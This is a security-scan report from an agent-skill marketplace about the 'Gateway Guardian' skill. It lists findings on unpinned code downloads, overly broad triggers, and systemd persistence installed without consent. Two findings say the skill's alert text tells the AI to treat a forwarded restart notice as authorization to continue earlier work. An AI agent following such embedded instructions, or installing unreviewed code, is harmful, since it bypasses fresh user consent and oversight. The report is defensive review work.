ClawHub

Gateway Guardian

Security checks across malware telemetry and agentic risk

Overview

Gateway Guardian appears purpose-built for OpenClaw gateway recovery, but it installs persistent services and uses under-scoped installation and notification behavior that users should review carefully.

Install only if you intentionally want a background guardian that can modify OpenClaw config, restart the gateway, and send operational notifications. Prefer a version that uses the packaged reviewed scripts or pinned checksummed downloads, validates or safely quotes guardian.conf values, and asks for explicit confirmation before making persistent systemd changes. Review recovery alerts before forwarding them because they may contain logs or operational details.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (5)

Description-Behavior Mismatch

Medium
Confidence
93% confidence
Finding
The skill instructs the agent to fetch executable files directly from a live GitHub branch and install them into the local skills directory without pinning a commit, verifying checksums, or validating signatures. That creates a software supply-chain risk: the repository contents can change after review, allowing arbitrary code execution during installation.

Vague Triggers

Medium
Confidence
88% confidence
Finding
The trigger set includes generic phrases like 'install this skill' and multilingual variants that may match ordinary conversation and cause unintended activation. In this skill, accidental activation is more dangerous because activation leads to package installation, file downloads, config writes, and systemd persistence changes.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The instructions direct the agent to install packages, download code, write configuration files, and modify systemd user services, but they do not require a clear, upfront warning and explicit consent for those persistent system changes. This increases the risk of users authorizing actions without understanding that the skill creates background services and alters service failure behavior.

Ssd 1

Medium
Confidence
92% confidence
Finding
The notification text tells the AI to treat a forwarded system alert as sufficient context to continue automatically, which weakens the requirement for fresh user intent and contextual re-validation. In an agent environment, this can cause resumed actions after an interruption without confirming whether the user still wants the prior operation to continue or whether conditions have changed.

Ssd 1

Medium
Confidence
94% confidence
Finding
This section reinforces a semantic handoff pattern where forwarding a restart notice is treated as authorization for the agent to continue prior work. That is dangerous because a restart event does not reliably preserve user consent, task integrity, or environmental assumptions, especially for installation, configuration, or other state-changing operations.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal